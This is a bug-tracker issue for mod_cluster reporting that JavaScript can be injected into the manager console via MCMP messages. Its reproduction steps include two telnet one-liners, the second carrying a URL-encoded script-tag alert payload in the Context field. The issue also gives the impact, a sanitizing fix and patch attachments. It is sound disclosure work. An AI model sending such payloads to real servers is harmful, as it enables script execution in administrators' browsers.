Uploaded image for project: 'mod_cluster'
  1. mod_cluster
  2. MODCLUSTER-453

It is possible to inject JavaScript into mod_cluster manager console via MCMP messages

    Details

      Description

      This is a nasty one indeed

      Steps to reproduce

      • start Apache HTTP Server with mod_cluster
      • send these messages (provided you test instance listens on 127.0.0.1)
        { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
        { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
        
      • Open http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being executed.

      Impact

      • Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come from could send these messages and execute arbitrary JavaScript code.

      Suggestion

      • Leverage apr_escape* to sanitize MCMP messages.

      Proposed patch

        Gliffy Diagrams

          Attachments

          1. MODCLUSTER-453_master-better_one.patch
            8 kB
          2. MODCLUSTER-453_master-mbabacek.patch
            1 kB
          3. MODCLUSTER-453_master-offensive_approach.patch
            5 kB
          4. patch.new.best.patch
            1 kB
          5. patch.new.txt
            0.7 kB
          6. patch.txt
            0.6 kB

            Activity

              People

              • Assignee:
                jfclere Jean-Frederic Clere
                Reporter:
                mbabacek Michal Karm
              • Votes:
                0 Vote for this issue
                Watchers:
                4 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: